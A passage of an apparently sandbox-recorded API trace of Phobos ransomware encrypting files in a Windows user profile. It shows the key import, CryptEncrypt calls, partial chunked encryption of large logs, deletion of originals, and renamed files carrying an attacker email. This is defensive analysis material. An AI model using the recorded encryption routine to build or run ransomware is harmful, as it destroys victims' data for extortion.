Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini")) returned 0x2026 [0201.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.119] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.119] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.119] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.119] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.119] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0201.120] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0201.120] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0201.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0201.121] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.121] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.121] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.121] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.121] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.121] CloseHandle (hObject=0x13c) returned 1 [0201.121] CloseHandle (hObject=0x174) returned 1 [0201.121] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini")) returned 1 [0201.122] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.123] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0201.137] CloseHandle (hObject=0x174) returned 1 [0201.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini")) returned 0x2026 [0201.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.137] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.138] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.139] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.139] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.139] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0201.139] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0201.139] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0201.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0201.140] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.140] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.140] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.140] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.140] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.140] CloseHandle (hObject=0x174) returned 1 [0201.141] CloseHandle (hObject=0x13c) returned 1 [0201.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini")) returned 1 [0201.141] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.143] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2097152) returned 1 [0201.143] CloseHandle (hObject=0x13c) returned 1 [0201.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log")) returned 0x2020 [0201.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0201.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.144] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.144] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.144] ReadFile (in: hFile=0x13c, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.313] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.313] ReadFile (in: hFile=0x13c, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.346] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.346] ReadFile (in: hFile=0x13c, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32a28) returned 1 [0201.391] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.391] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060) returned 1 [0201.397] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.397] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0201.397] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0112, lpOverlapped=0x0) returned 1 [0201.416] SetEndOfFile (hFile=0x13c) returned 1 [0201.416] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.416] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.418] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.418] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.420] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.420] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.421] CloseHandle (hObject=0x13c) returned 1 [0201.421] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.422] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2097152) returned 1 [0201.422] CloseHandle (hObject=0x13c) returned 1 [0201.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log")) returned 0x2020 [0201.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0201.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.423] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.423] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.423] ReadFile (in: hFile=0x13c, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.545] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.545] ReadFile (in: hFile=0x13c, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.729] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0201.729] ReadFile (in: hFile=0x13c, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0201.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32868) returned 1 [0201.788] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.788] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060) returned 1 [0201.794] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.794] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0201.794] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0112, lpOverlapped=0x0) returned 1 [0201.813] SetEndOfFile (hFile=0x13c) returned 1 [0201.814] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.814] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.815] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.815] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.818] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0201.818] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0201.819] CloseHandle (hObject=0x13c) returned 1 [0201.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.820] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=645) returned 1 [0201.820] CloseHandle (hObject=0x13c) returned 1 [0201.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini")) returned 0x2026 [0201.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.821] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.821] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.265] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0202.265] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.265] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x285, lpOverlapped=0x0) returned 1 [0202.265] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290, dwBufLen=0x290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290) returned 1 [0202.265] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x290, lpOverlapped=0x0) returned 1 [0202.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.267] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.267] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.267] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.267] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.267] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.267] CloseHandle (hObject=0x13c) returned 1 [0202.268] CloseHandle (hObject=0x160) returned 1 [0202.268] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini")) returned 1 [0202.269] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, 